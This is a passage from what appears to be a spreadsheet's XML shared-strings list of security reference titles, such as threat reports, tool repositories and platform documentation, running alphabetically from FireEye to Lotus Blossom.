    <t>FireEye Hijacking July 2010</t>
  </si>
  <si>
    <t>FireEye Hikit Rootkit</t>
  </si>
  <si>
    <t>FireEye KEGTAP SINGLEMALT October 2020</t>
  </si>
  <si>
    <t>FireEye Kevin Mandia Guardrails</t>
  </si>
  <si>
    <t>FireEye Know Your Enemy FIN8 Aug 2016</t>
  </si>
  <si>
    <t>FireEye MESSAGETAP October 2019</t>
  </si>
  <si>
    <t>FireEye Mail CDS 2018</t>
  </si>
  <si>
    <t>FireEye Maze May 2020</t>
  </si>
  <si>
    <t>FireEye Metamorfo Apr 2018</t>
  </si>
  <si>
    <t>FireEye MuddyWater Mar 2018</t>
  </si>
  <si>
    <t>FireEye NETWIRE March 2019</t>
  </si>
  <si>
    <t>FireEye Njw0rm Aug 2013</t>
  </si>
  <si>
    <t>FireEye Obfuscation June 2017</t>
  </si>
  <si>
    <t>FireEye Op RussianDoll</t>
  </si>
  <si>
    <t>FireEye OpPoisonedHandover February 2016</t>
  </si>
  <si>
    <t>FireEye Operation Double Tap</t>
  </si>
  <si>
    <t>FireEye Operation Molerats</t>
  </si>
  <si>
    <t>FireEye Operation Saffron Rose 2013</t>
  </si>
  <si>
    <t>FireEye Outlook Dec 2019</t>
  </si>
  <si>
    <t>FireEye PLA</t>
  </si>
  <si>
    <t>FireEye POSHSPY April 2017</t>
  </si>
  <si>
    <t>FireEye Periscope March 2018</t>
  </si>
  <si>
    <t>FireEye Poison Ivy</t>
  </si>
  <si>
    <t>FireEye PowerShell Logging</t>
  </si>
  <si>
    <t>FireEye PowerShell Logging 2016</t>
  </si>
  <si>
    <t>FireEye Ransomware Disrupt Industrial Production</t>
  </si>
  <si>
    <t>FireEye Ransomware Feb 2020</t>
  </si>
  <si>
    <t>FireEye Regsvr32 Targeting Mongolian Gov</t>
  </si>
  <si>
    <t>FireEye Respond Webinar July 2017</t>
  </si>
  <si>
    <t>FireEye Revoke-Obfuscation July 2017</t>
  </si>
  <si>
    <t>FireEye Ryuk and Trickbot January 2019</t>
  </si>
  <si>
    <t>FireEye SMOKEDHAM June 2021</t>
  </si>
  <si>
    <t>FireEye SUNBURST Additional Details Dec 2020</t>
  </si>
  <si>
    <t>FireEye SUNBURST Backdoor December 2020</t>
  </si>
  <si>
    <t>FireEye SUNSHUTTLE Mar 2021</t>
  </si>
  <si>
    <t>FireEye Shamoon Nov 2016</t>
  </si>
  <si>
    <t>FireEye Shining A Light on DARKSIDE May 2021</t>
  </si>
  <si>
    <t>FireEye Sunshop Campaign May 2013</t>
  </si>
  <si>
    <t>FireEye TEMP.Veles 2018</t>
  </si>
  <si>
    <t xml:space="preserve">FireEye TEMP.Veles 2018 </t>
  </si>
  <si>
    <t>FireEye TEMP.Veles JSON April 2019</t>
  </si>
  <si>
    <t>FireEye TLS Nov 2017</t>
  </si>
  <si>
    <t>FireEye TRITON 2017</t>
  </si>
  <si>
    <t>FireEye TRITON 2019</t>
  </si>
  <si>
    <t>FireEye Targeted Attacks Middle East Banks</t>
  </si>
  <si>
    <t>FireEye Ursnif Nov 2017</t>
  </si>
  <si>
    <t>FireEye VBA stomp Feb 2020</t>
  </si>
  <si>
    <t>FireEye WMI 2015</t>
  </si>
  <si>
    <t>FireEye WMI SANS 2015</t>
  </si>
  <si>
    <t>FireEye WannaCry 2017</t>
  </si>
  <si>
    <t>FireEye admin@338</t>
  </si>
  <si>
    <t>FireEye admin@338 March 2014</t>
  </si>
  <si>
    <t>FireEye fxsst June 2011</t>
  </si>
  <si>
    <t>FireEyeSupplyChain</t>
  </si>
  <si>
    <t>Fireeye Hunting COM June 2019</t>
  </si>
  <si>
    <t>Flashpoint FIN 7 March 2019</t>
  </si>
  <si>
    <t>Following the CloudTrail: Generating strong AWS security signals with Sumo Logic</t>
  </si>
  <si>
    <t>Forbes Dyre May 2017</t>
  </si>
  <si>
    <t>Forbes GitHub Creds</t>
  </si>
  <si>
    <t>Forcepoint BITTER Pakistan Oct 2016</t>
  </si>
  <si>
    <t>Forcepoint Carbanak Google C2</t>
  </si>
  <si>
    <t>Forcepoint Felismus Mar 2017</t>
  </si>
  <si>
    <t>Forcepoint Monsoon</t>
  </si>
  <si>
    <t>Fortinet Agent Tesla April 2018</t>
  </si>
  <si>
    <t>Fortinet Agent Tesla June 2017</t>
  </si>
  <si>
    <t>Fortinet Diavol July 2021</t>
  </si>
  <si>
    <t>Fortinet Emotet May 2017</t>
  </si>
  <si>
    <t>Fortinet Fareit</t>
  </si>
  <si>
    <t>Fortinet Metamorfo Feb 2020</t>
  </si>
  <si>
    <t>Fortinet Remcos Feb 2017</t>
  </si>
  <si>
    <t>Fortinet TrickBot</t>
  </si>
  <si>
    <t>Fortune Dragonfly 2.0 Sept 2017</t>
  </si>
  <si>
    <t>Fox-It Anunak Feb 2015</t>
  </si>
  <si>
    <t>FoxIT Wocao December 2019</t>
  </si>
  <si>
    <t>Free Desktop Application Autostart Feb 2006</t>
  </si>
  <si>
    <t>Free Desktop Entry Keys</t>
  </si>
  <si>
    <t>FreeDesktop Journal</t>
  </si>
  <si>
    <t>Freedesktop.org Linux systemd 29SEP2018</t>
  </si>
  <si>
    <t>Frisk DMA August 2016</t>
  </si>
  <si>
    <t>Fysbis Dr Web Analysis</t>
  </si>
  <si>
    <t>Fysbis Palo Alto Analysis</t>
  </si>
  <si>
    <t>G Data Sodinokibi June 2019</t>
  </si>
  <si>
    <t>GCN RSA June 2011</t>
  </si>
  <si>
    <t>GCP - Creating and Starting a VM</t>
  </si>
  <si>
    <t>GCP Create Cloud Identity Users</t>
  </si>
  <si>
    <t>GCP Monitoring Service Account Usage</t>
  </si>
  <si>
    <t>GCP Packet Mirroring</t>
  </si>
  <si>
    <t>GCP SSH Key Add</t>
  </si>
  <si>
    <t>GCPBucketBrute</t>
  </si>
  <si>
    <t>GDATA COM Hijacking</t>
  </si>
  <si>
    <t>GDATA Zeus Panda June 2017</t>
  </si>
  <si>
    <t>GDS Linux Injection</t>
  </si>
  <si>
    <t>GLIBC</t>
  </si>
  <si>
    <t>GMER Rootkits</t>
  </si>
  <si>
    <t>GNU Acct</t>
  </si>
  <si>
    <t>GNU Fork</t>
  </si>
  <si>
    <t>GRIZZLY STEPPE JAR</t>
  </si>
  <si>
    <t>GTFO split</t>
  </si>
  <si>
    <t>GTFOBins Suid</t>
  </si>
  <si>
    <t>GTFObins at</t>
  </si>
  <si>
    <t>Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass</t>
  </si>
  <si>
    <t>Gallagher 2015</t>
  </si>
  <si>
    <t>Ge 2011</t>
  </si>
  <si>
    <t>Gemini FIN7 Oct 2021</t>
  </si>
  <si>
    <t>GentilKiwi Pass the Ticket</t>
  </si>
  <si>
    <t>Gh0stRAT ATT March 2019</t>
  </si>
  <si>
    <t>Gigamon Berserk Bear October 2021</t>
  </si>
  <si>
    <t>GitHub ATTACK Empire</t>
  </si>
  <si>
    <t>GitHub AWS-ADFS-Credential-Generator</t>
  </si>
  <si>
    <t>GitHub Bloodhound</t>
  </si>
  <si>
    <t>GitHub CertStealer</t>
  </si>
  <si>
    <t>GitHub Certify</t>
  </si>
  <si>
    <t>GitHub Cloud Service Credentials</t>
  </si>
  <si>
    <t>GitHub Conveigh</t>
  </si>
  <si>
    <t>GitHub Creddump7</t>
  </si>
  <si>
    <t>GitHub DCSYNCMonitor</t>
  </si>
  <si>
    <t>GitHub Diamorphine</t>
  </si>
  <si>
    <t>GitHub Disable DDEAUTO Oct 2017</t>
  </si>
  <si>
    <t>GitHub GhostPack Certificates</t>
  </si>
  <si>
    <t>GitHub Gitrob</t>
  </si>
  <si>
    <t>GitHub Hashjacking</t>
  </si>
  <si>
    <t>GitHub IAD Secure Host Baseline UAC Filtering</t>
  </si>
  <si>
    <t>GitHub Inveigh</t>
  </si>
  <si>
    <t>GitHub Invoke-Obfuscation</t>
  </si>
  <si>
    <t>GitHub Invoke-PSImage</t>
  </si>
  <si>
    <t>GitHub LaZagne Dec 2018</t>
  </si>
  <si>
    <t>GitHub MOTW</t>
  </si>
  <si>
    <t>GitHub MailSniper</t>
  </si>
  <si>
    <t>GitHub Malleable C2</t>
  </si>
  <si>
    <t>GitHub Mauraena</t>
  </si>
  <si>
    <t>GitHub Mimikatz Issue 92 June 2017</t>
  </si>
  <si>
    <t>GitHub Mimikatz kerberos Module</t>
  </si>
  <si>
    <t>GitHub Mimikatz lsadump Module</t>
  </si>
  <si>
    <t>GitHub Mimikittenz July 2016</t>
  </si>
  <si>
    <t>GitHub NBNSpoof</t>
  </si>
  <si>
    <t>GitHub Office 365 User Enumeration</t>
  </si>
  <si>
    <t>GitHub Office-Crackros Aug 2016</t>
  </si>
  <si>
    <t>GitHub OmerYa Invisi-Shell</t>
  </si>
  <si>
    <t>GitHub PSImage</t>
  </si>
  <si>
    <t>GitHub PSPKIAudit</t>
  </si>
  <si>
    <t>GitHub Pacu</t>
  </si>
  <si>
    <t>GitHub PcShare 2014</t>
  </si>
  <si>
    <t>GitHub Phishery</t>
  </si>
  <si>
    <t>GitHub PoshC2</t>
  </si>
  <si>
    <t>GitHub PowerSploit May 2012</t>
  </si>
  <si>
    <t>GitHub Pupy</t>
  </si>
  <si>
    <t>GitHub QuasarRAT</t>
  </si>
  <si>
    <t>GitHub Raindance</t>
  </si>
  <si>
    <t>GitHub Reptile</t>
  </si>
  <si>
    <t>GitHub Responder</t>
  </si>
  <si>
    <t>GitHub Revoke-Obfuscation</t>
  </si>
  <si>
    <t>GitHub SHB Credential Guard</t>
  </si>
  <si>
    <t>GitHub SILENTTRINITY March 2022</t>
  </si>
  <si>
    <t>GitHub SILENTTRINITY Modules July 2019</t>
  </si>
  <si>
    <t>GitHub SIP POC Sept 2017</t>
  </si>
  <si>
    <t>GitHub Sliver C2</t>
  </si>
  <si>
    <t>GitHub Sliver C2 DNS</t>
  </si>
  <si>
    <t>GitHub Sliver Download</t>
  </si>
  <si>
    <t>GitHub Sliver Encryption</t>
  </si>
  <si>
    <t>GitHub Sliver File System August 2021</t>
  </si>
  <si>
    <t>GitHub Sliver HTTP</t>
  </si>
  <si>
    <t>GitHub Sliver Ifconfig</t>
  </si>
  <si>
    <t>GitHub Sliver Netstat</t>
  </si>
  <si>
    <t>GitHub Sliver Screen</t>
  </si>
  <si>
    <t>GitHub Sliver Upload</t>
  </si>
  <si>
    <t>GitHub Turla Driver Loader</t>
  </si>
  <si>
    <t>GitHub Ultimate AppLocker Bypass List</t>
  </si>
  <si>
    <t>GitHub truffleHog</t>
  </si>
  <si>
    <t>GitLab WakeOnLAN</t>
  </si>
  <si>
    <t>Github AD-Pentest-Script</t>
  </si>
  <si>
    <t>Github CHIPSEC</t>
  </si>
  <si>
    <t>Github EmpireProject CreateHijacker Dylib</t>
  </si>
  <si>
    <t>Github EmpireProject HijackScanner</t>
  </si>
  <si>
    <t>Github KeeThief</t>
  </si>
  <si>
    <t>Github Koadic</t>
  </si>
  <si>
    <t>Github Mempdump</t>
  </si>
  <si>
    <t>Github Netsh Helper CS Beacon</t>
  </si>
  <si>
    <t>Github NoRunDll</t>
  </si>
  <si>
    <t>Github PSAttack</t>
  </si>
  <si>
    <t>Github PowerShell Empire</t>
  </si>
  <si>
    <t>Github PowerSploit Ninjacopy</t>
  </si>
  <si>
    <t>Github Rapid7 Meterpreter Elevate</t>
  </si>
  <si>
    <t>Github UACMe</t>
  </si>
  <si>
    <t>Github W32Time Oct 2017</t>
  </si>
  <si>
    <t>Github evilginx2</t>
  </si>
  <si>
    <t>Glitch-Cat Green Lambert ATTCK Oct 2021</t>
  </si>
  <si>
    <t>GlobalDotName Jun 2019</t>
  </si>
  <si>
    <t>Gmail Delegation</t>
  </si>
  <si>
    <t>Gnome Remote Desktop grd-settings</t>
  </si>
  <si>
    <t>Gnome Remote Desktop gschema</t>
  </si>
  <si>
    <t>GoBotKR</t>
  </si>
  <si>
    <t>Google - Restore Cloud Snapshot</t>
  </si>
  <si>
    <t>Google Cloud - IAM Servie Accounts List API</t>
  </si>
  <si>
    <t>Google Cloud Add Metadata</t>
  </si>
  <si>
    <t>Google Cloud Encryption Key Rotation</t>
  </si>
  <si>
    <t>Google Cloud IAM Policies</t>
  </si>
  <si>
    <t>Google Cloud Identity API Documentation</t>
  </si>
  <si>
    <t>Google Cloud Privilege Escalation</t>
  </si>
  <si>
    <t>Google Cloud Service Account Credentials</t>
  </si>
  <si>
    <t>Google Cloud Storage</t>
  </si>
  <si>
    <t>Google Cloud Storage Best Practices, 2019</t>
  </si>
  <si>
    <t>Google Command Center Dashboard</t>
  </si>
  <si>
    <t>Google Compute Instances</t>
  </si>
  <si>
    <t>Google EXOTIC LILY March 2022</t>
  </si>
  <si>
    <t>Google Election Threats October 2020</t>
  </si>
  <si>
    <t>Google Ensuring Your Information is Safe</t>
  </si>
  <si>
    <t>Google Federating GC</t>
  </si>
  <si>
    <t>Google Instances Resource</t>
  </si>
  <si>
    <t>Google TAG Lazarus Jan 2021</t>
  </si>
  <si>
    <t>Google TAG Ukraine Threat Landscape March 2022</t>
  </si>
  <si>
    <t>Google VM</t>
  </si>
  <si>
    <t>Google VPC Overview</t>
  </si>
  <si>
    <t>Google Workspace Global Access List</t>
  </si>
  <si>
    <t>GovCERT Carbon May 2016</t>
  </si>
  <si>
    <t>Graeber 2014</t>
  </si>
  <si>
    <t>GrimBlog UsernameEnum</t>
  </si>
  <si>
    <t>Group IB APT 41 June 2021</t>
  </si>
  <si>
    <t>Group IB Cobalt Aug 2017</t>
  </si>
  <si>
    <t>Group IB GrimAgent July 2021</t>
  </si>
  <si>
    <t>Group IB RTM August 2019</t>
  </si>
  <si>
    <t>Group IB Ransomware May 2020</t>
  </si>
  <si>
    <t>Group IB Ransomware September 2020</t>
  </si>
  <si>
    <t>Group IB Silence Aug 2019</t>
  </si>
  <si>
    <t>Group IB Silence Sept 2018</t>
  </si>
  <si>
    <t>Group-IB Anunak</t>
  </si>
  <si>
    <t>Guidepoint SUPERNOVA Dec 2020</t>
  </si>
  <si>
    <t>HAYMAKER</t>
  </si>
  <si>
    <t>HIDDEN COBRA</t>
  </si>
  <si>
    <t>HIPAA Journal S3 Breach, 2017</t>
  </si>
  <si>
    <t>HTML Smuggling Menlo Security 2020</t>
  </si>
  <si>
    <t>Hacker News LuckyMouse June 2018</t>
  </si>
  <si>
    <t>HackerNews - 3 SaaS App Cyber Attacks - April 2022</t>
  </si>
  <si>
    <t>HackerNews IndigoZebra July 2021</t>
  </si>
  <si>
    <t>HackersArise Email</t>
  </si>
  <si>
    <t>Hakobyan 2009</t>
  </si>
  <si>
    <t>Hangover Group</t>
  </si>
  <si>
    <t>Haq 2014</t>
  </si>
  <si>
    <t>Harmj0y Abusing GPO Permissions</t>
  </si>
  <si>
    <t>Harmj0y DCSync Sept 2015</t>
  </si>
  <si>
    <t>Harmj0y Domain Trusts</t>
  </si>
  <si>
    <t>Harmj0y Kerberoast Nov 2016</t>
  </si>
  <si>
    <t>Harmj0y Mimikatz and DCSync</t>
  </si>
  <si>
    <t>Harmj0y Roasting AS-REPs Jan 2017</t>
  </si>
  <si>
    <t>Harmj0y SeEnableDelegationPrivilege Right</t>
  </si>
  <si>
    <t>Hartrell cd00r 2002</t>
  </si>
  <si>
    <t>Havana authentication bug</t>
  </si>
  <si>
    <t>Help eliminate unquoted path</t>
  </si>
  <si>
    <t>Hexacorn Logon Scripts</t>
  </si>
  <si>
    <t>Hexacorn Office Template Macros</t>
  </si>
  <si>
    <t>Hexacorn Office Test</t>
  </si>
  <si>
    <t>Hide GDM User Accounts</t>
  </si>
  <si>
    <t>Hiding Malicious Code with Module Stomping</t>
  </si>
  <si>
    <t>HighTech Bridge Inline Hooking Sept 2011</t>
  </si>
  <si>
    <t>Hijacking VNC</t>
  </si>
  <si>
    <t>Hornet Security Avaddon June 2020</t>
  </si>
  <si>
    <t>HowToGeek ShowExtension</t>
  </si>
  <si>
    <t>Huntress API Hash</t>
  </si>
  <si>
    <t>Hybrid Analysis Icacls1 June 2018</t>
  </si>
  <si>
    <t>Hybrid Analysis Icacls2 May 2018</t>
  </si>
  <si>
    <t>IBM Grandoreiro April 2020</t>
  </si>
  <si>
    <t>IBM ITG07 June 2019</t>
  </si>
  <si>
    <t>IBM ITG18 2020</t>
  </si>
  <si>
    <t>IBM IcedID November 2017</t>
  </si>
  <si>
    <t>IBM MegaCortex</t>
  </si>
  <si>
    <t>IBM Ransomware Trends September 2020</t>
  </si>
  <si>
    <t>IBM Storwize</t>
  </si>
  <si>
    <t>IBM TA505 April 2020</t>
  </si>
  <si>
    <t>IBM TrickBot Nov 2016</t>
  </si>
  <si>
    <t>ICANNDomainNameHijacking</t>
  </si>
  <si>
    <t>ICEBRG Chrome Extensions</t>
  </si>
  <si>
    <t>ICIT China's Espionage Jul 2016</t>
  </si>
  <si>
    <t>IIS Backdoor 2011</t>
  </si>
  <si>
    <t>IOKit Fundamentals</t>
  </si>
  <si>
    <t>IRED API Hashing</t>
  </si>
  <si>
    <t>ISACA Malware Tricks</t>
  </si>
  <si>
    <t>ITG14</t>
  </si>
  <si>
    <t>ITSyndicate Disabling PHP functions</t>
  </si>
  <si>
    <t>ITWorld Hard Disk Health Dec 2014</t>
  </si>
  <si>
    <t>Imminent Unit42 Dec2019</t>
  </si>
  <si>
    <t>Impacket Tools</t>
  </si>
  <si>
    <t>Imperva DDoS for Hire</t>
  </si>
  <si>
    <t>Increasing Linux kernel integrity</t>
  </si>
  <si>
    <t>InfoSecurity Sandworm Oct 2014</t>
  </si>
  <si>
    <t>Infoblox Lokibot January 2019</t>
  </si>
  <si>
    <t>Infosecinstitute RTLO Technique</t>
  </si>
  <si>
    <t>Init Man Page</t>
  </si>
  <si>
    <t>InsiderThreat ChangeNTLM July 2017</t>
  </si>
  <si>
    <t>InsiderThreat NTFS EA Oct 2017</t>
  </si>
  <si>
    <t>Installer Package Scripting Rich Trouton</t>
  </si>
  <si>
    <t>Intego Shlayer Apr 2018</t>
  </si>
  <si>
    <t>Intego Shlayer Feb 2018</t>
  </si>
  <si>
    <t>Intel 471 REvil March 2020</t>
  </si>
  <si>
    <t>Intel HackingTeam UEFI Rootkit</t>
  </si>
  <si>
    <t>Intel Hardware-based Security Technologies</t>
  </si>
  <si>
    <t>Intezer ACBackdoor</t>
  </si>
  <si>
    <t>Intezer App Service Phishing</t>
  </si>
  <si>
    <t>Intezer Aurora Sept 2017</t>
  </si>
  <si>
    <t>Intezer Doki July 20</t>
  </si>
  <si>
    <t>Intezer HiddenWasp Map 2019</t>
  </si>
  <si>
    <t>Intezer Russian APT Dec 2020</t>
  </si>
  <si>
    <t>Intezer TeamTNT Explosion September 2021</t>
  </si>
  <si>
    <t>Intezer TeamTNT September 2020</t>
  </si>
  <si>
    <t>Intrinsec Egregor Nov 2020</t>
  </si>
  <si>
    <t>Introducing Donut</t>
  </si>
  <si>
    <t>Invincea XTunnel</t>
  </si>
  <si>
    <t>IranThreats Kittens Dec 2017</t>
  </si>
  <si>
    <t>IronNet BlackTech Oct 2021</t>
  </si>
  <si>
    <t>Irongeek Sims BSides 2017</t>
  </si>
  <si>
    <t>IssueMakersLab Andariel GoldenAxe May 2017</t>
  </si>
  <si>
    <t>JPCERT ChChes Feb 2017</t>
  </si>
  <si>
    <t>JPCert BlackTech Malware September 2019</t>
  </si>
  <si>
    <t>JPCert PLEAD Downloader June 2018</t>
  </si>
  <si>
    <t>JPCert TSCookie March 2018</t>
  </si>
  <si>
    <t>JScrip May 2018</t>
  </si>
  <si>
    <t>JackOfHearts</t>
  </si>
  <si>
    <t>Jacobsen 2014</t>
  </si>
  <si>
    <t>James TermServ DLL</t>
  </si>
  <si>
    <t>Jamf User Password Policies</t>
  </si>
  <si>
    <t>Jay GetHooks Sept 2011</t>
  </si>
  <si>
    <t>Joe Sec Nymaim</t>
  </si>
  <si>
    <t>Joe Sec Trickbot</t>
  </si>
  <si>
    <t>JoeSecurity Egregor 2020</t>
  </si>
  <si>
    <t>Journey into IR ZeroAccess NTFS EA</t>
  </si>
  <si>
    <t>Juniper DAI 2020</t>
  </si>
  <si>
    <t>Juniper IcedID June 2020</t>
  </si>
  <si>
    <t>Juniper Netscreen of the Dead</t>
  </si>
  <si>
    <t>Juniper Traffic Mirroring</t>
  </si>
  <si>
    <t>K8s Authorization Overview</t>
  </si>
  <si>
    <t>KISA Operation Muzabi</t>
  </si>
  <si>
    <t>Kali Hydra</t>
  </si>
  <si>
    <t>Kali Redsnarf</t>
  </si>
  <si>
    <t>Kansa Service related collectors</t>
  </si>
  <si>
    <t>Kanthak Sentinel</t>
  </si>
  <si>
    <t>Kaspersky APT Trends Q1 2020</t>
  </si>
  <si>
    <t>Kaspersky APT Trends Q1 April 2021</t>
  </si>
  <si>
    <t>Kaspersky Adwind Feb 2016</t>
  </si>
  <si>
    <t>Kaspersky Andariel Ransomware June 2021</t>
  </si>
  <si>
    <t>Kaspersky CactusPete Aug 2020</t>
  </si>
  <si>
    <t>Kaspersky Carbanak</t>
  </si>
  <si>
    <t>Kaspersky Careto</t>
  </si>
  <si>
    <t>Kaspersky Cloud Atlas August 2019</t>
  </si>
  <si>
    <t>Kaspersky Cloud Atlas December 2014</t>
  </si>
  <si>
    <t>Kaspersky Darkhotel</t>
  </si>
  <si>
    <t>Kaspersky Dridex May 2017</t>
  </si>
  <si>
    <t>Kaspersky Dtrack</t>
  </si>
  <si>
    <t>Kaspersky Duqu 2.0</t>
  </si>
  <si>
    <t>Kaspersky Emotet Jan 2019</t>
  </si>
  <si>
    <t>Kaspersky Equation QA</t>
  </si>
  <si>
    <t>Kaspersky Ferocious Kitten Jun 2021</t>
  </si>
  <si>
    <t>Kaspersky Flame</t>
  </si>
  <si>
    <t>Kaspersky Flame Functionality</t>
  </si>
  <si>
    <t>Kaspersky Gauss Whitepaper</t>
  </si>
  <si>
    <t>Kaspersky IAmTheKing October 2020</t>
  </si>
  <si>
    <t>Kaspersky Lab SynAck May 2018</t>
  </si>
  <si>
    <t>Kaspersky Lamberts Toolkit April 2017</t>
  </si>
  <si>
    <t>Kaspersky Lazarus Under The Hood APR 2017</t>
  </si>
  <si>
    <t>Kaspersky Lazarus Under The Hood Blog 2017</t>
  </si>
  <si>
    <t>Kaspersky Lyceum October 2021</t>
  </si>
  <si>
    <t>Kaspersky MSSQL Aug 2019</t>
  </si>
  <si>
    <t>Kaspersky MoleRATs April 2019</t>
  </si>
  <si>
    <t>Kaspersky NetTraveler</t>
  </si>
  <si>
    <t>Kaspersky Poseidon Group</t>
  </si>
  <si>
    <t>Kaspersky ProjectSauron Blog</t>
  </si>
  <si>
    <t>Kaspersky ProjectSauron Full Report</t>
  </si>
  <si>
    <t>Kaspersky ProjectSauron Technical Analysis</t>
  </si>
  <si>
    <t>Kaspersky QakBot September 2021</t>
  </si>
  <si>
    <t>Kaspersky RTLO Cyber Crime</t>
  </si>
  <si>
    <t>Kaspersky Regin</t>
  </si>
  <si>
    <t>Kaspersky ShadowPad Aug 2017</t>
  </si>
  <si>
    <t>Kaspersky Sodin July 2019</t>
  </si>
  <si>
    <t>Kaspersky Sofacy</t>
  </si>
  <si>
    <t>Kaspersky StoneDrill 2017</t>
  </si>
  <si>
    <t>Kaspersky Superfish</t>
  </si>
  <si>
    <t>Kaspersky TajMahal April 2019</t>
  </si>
  <si>
    <t>Kaspersky ThreatNeedle Feb 2021</t>
  </si>
  <si>
    <t>Kaspersky Tomiris Sep 2021</t>
  </si>
  <si>
    <t>Kaspersky Transparent Tribe August 2020</t>
  </si>
  <si>
    <t>Kaspersky Turla</t>
  </si>
  <si>
    <t>Kaspersky Turla Aug 2014</t>
  </si>
  <si>
    <t>Kaspersky Turla Penquin December 2014</t>
  </si>
  <si>
    <t>Kaspersky WIRTE November 2021</t>
  </si>
  <si>
    <t>Kaspersky Winnti April 2013</t>
  </si>
  <si>
    <t>Kaspersky Winnti June 2015</t>
  </si>
  <si>
    <t>KasperskyCarbanak</t>
  </si>
  <si>
    <t>Kekeo</t>
  </si>
  <si>
    <t>Kernel Self Protection Project</t>
  </si>
  <si>
    <t>Kernel.org Restrict Kernel Module</t>
  </si>
  <si>
    <t>Kettle CSV DDE Aug 2014</t>
  </si>
  <si>
    <t>Kevin Mandia Statement to US Senate Committee on Intelligence</t>
  </si>
  <si>
    <t>Keychain Decryption Passware</t>
  </si>
  <si>
    <t>Keychain Items Apple Dev API</t>
  </si>
  <si>
    <t>Keychain Services Apple</t>
  </si>
  <si>
    <t>Keyctl-unmask</t>
  </si>
  <si>
    <t>Kickstart Apple Remote Desktop commands</t>
  </si>
  <si>
    <t>Kifarunix - Task Scheduling in Linux</t>
  </si>
  <si>
    <t>KillDisk Ransomware</t>
  </si>
  <si>
    <t>Killing IOS diversity myth</t>
  </si>
  <si>
    <t>Killing the myth of Cisco IOS rootkits</t>
  </si>
  <si>
    <t>Klein Active Setup 2010</t>
  </si>
  <si>
    <t>Koczwara Beacon Hunting Sep 2021</t>
  </si>
  <si>
    <t>Korean FSI TA505 2020</t>
  </si>
  <si>
    <t>Krebs Adobe</t>
  </si>
  <si>
    <t>Krebs Capital One August 2019</t>
  </si>
  <si>
    <t>Krebs DNS Hijack 2019</t>
  </si>
  <si>
    <t>Krebs-Anna</t>
  </si>
  <si>
    <t>Krebs-Bazaar</t>
  </si>
  <si>
    <t>Krebs-Booter</t>
  </si>
  <si>
    <t>Kroll Qakbot June 2020</t>
  </si>
  <si>
    <t>Kroll RawPOS Jan 2017</t>
  </si>
  <si>
    <t>Kube Kubectl</t>
  </si>
  <si>
    <t>Kube Pod</t>
  </si>
  <si>
    <t>Kubectl Exec Get Shell</t>
  </si>
  <si>
    <t>Kubeflow Pipelines</t>
  </si>
  <si>
    <t>Kubernetes API</t>
  </si>
  <si>
    <t>Kubernetes API Control Access</t>
  </si>
  <si>
    <t>Kubernetes CronJob</t>
  </si>
  <si>
    <t>Kubernetes Dashboard</t>
  </si>
  <si>
    <t>Kubernetes Hardening Guide</t>
  </si>
  <si>
    <t>Kubernetes Jobs</t>
  </si>
  <si>
    <t>Kubernetes Kubelet</t>
  </si>
  <si>
    <t>Kubernetes Service Accounts</t>
  </si>
  <si>
    <t>LIBC</t>
  </si>
  <si>
    <t>LKM loading kernel restrictions</t>
  </si>
  <si>
    <t>LOLBAS Certutil</t>
  </si>
  <si>
    <t>LOLBAS Esentutl</t>
  </si>
  <si>
    <t>LOLBAS Expand</t>
  </si>
  <si>
    <t>LOLBAS Installutil</t>
  </si>
  <si>
    <t>LOLBAS Main Site</t>
  </si>
  <si>
    <t>LOLBAS Mavinject</t>
  </si>
  <si>
    <t>LOLBAS Msbuild</t>
  </si>
  <si>
    <t>LOLBAS Mshta</t>
  </si>
  <si>
    <t>LOLBAS Msiexec</t>
  </si>
  <si>
    <t>LOLBAS Odbcconf</t>
  </si>
  <si>
    <t>LOLBAS Project</t>
  </si>
  <si>
    <t>LOLBAS Regasm</t>
  </si>
  <si>
    <t>LOLBAS Regsvcs</t>
  </si>
  <si>
    <t>LOLBAS Regsvr32</t>
  </si>
  <si>
    <t>LOLBAS Tracker</t>
  </si>
  <si>
    <t>LOLBAS Verclsid</t>
  </si>
  <si>
    <t>LOLBAS Wmic</t>
  </si>
  <si>
    <t>Lab52 WIRTE Apr 2019</t>
  </si>
  <si>
    <t>Lacework TeamTNT May 2021</t>
  </si>
  <si>
    <t>Langer Stuxnet</t>
  </si>
  <si>
    <t>Lastline DarkHotel Just In Time Decryption Nov 2015</t>
  </si>
  <si>
    <t>Lastline PlugX Analysis</t>
  </si>
  <si>
    <t>Lateral Movement Payne</t>
  </si>
  <si>
    <t>Lau 2011</t>
  </si>
  <si>
    <t>Launch Service Keys Developer Apple</t>
  </si>
  <si>
    <t>Launch Services Apple Developer</t>
  </si>
  <si>
    <t>LaunchDaemon Hijacking</t>
  </si>
  <si>
    <t>Launchctl Man</t>
  </si>
  <si>
    <t>Lazarus APT January 2022</t>
  </si>
  <si>
    <t>Lazarus RATANKBA</t>
  </si>
  <si>
    <t>Learn XPC Exploitation</t>
  </si>
  <si>
    <t>Lee 2013</t>
  </si>
  <si>
    <t>Leitch Hollowing</t>
  </si>
  <si>
    <t>LemonDuck</t>
  </si>
  <si>
    <t>Leonardo Turla Penquin May 2020</t>
  </si>
  <si>
    <t>Let's Encrypt FAQ</t>
  </si>
  <si>
    <t>Linux FTP</t>
  </si>
  <si>
    <t>Linux IPC</t>
  </si>
  <si>
    <t>Linux Kerberos Tickets</t>
  </si>
  <si>
    <t>Linux Kernel API</t>
  </si>
  <si>
    <t>Linux Kernel Module Programming Guide</t>
  </si>
  <si>
    <t>Linux Kernel Programming</t>
  </si>
  <si>
    <t>Linux Loadable Kernel Module Insert and Remove LKMs</t>
  </si>
  <si>
    <t>Linux Logs</t>
  </si>
  <si>
    <t>Linux Password and Shadow File Formats</t>
  </si>
  <si>
    <t>Linux Services Run Levels</t>
  </si>
  <si>
    <t>Linux at</t>
  </si>
  <si>
    <t>Linux man-pages: systemd January 2014</t>
  </si>
  <si>
    <t>Linux manual bash invocation</t>
  </si>
  <si>
    <t>Linux/Cdorked.A We Live Security Analysis</t>
  </si>
  <si>
    <t>List Blobs</t>
  </si>
  <si>
    <t>ListObjectsV2</t>
  </si>
  <si>
    <t>Lockboxx ARD 2019</t>
  </si>
  <si>
    <t>LogRhythm Do You Trust Oct 2014</t>
  </si>
  <si>
    <t>LogRhythm WannaCry</t>
  </si>
  <si>
    <t>Login Items AE</t>
  </si>
  <si>
    <t>Login Scripts Apple Dev</t>
  </si>
  <si>
    <t>LoginWindowScripts Apple Dev</t>
  </si>
  <si>
    <t>Lookout Dark Caracal Jan 2018</t>
  </si>
  <si>
    <t>Lotus Blossom Dec 2015</t>
  </si>
  <si>
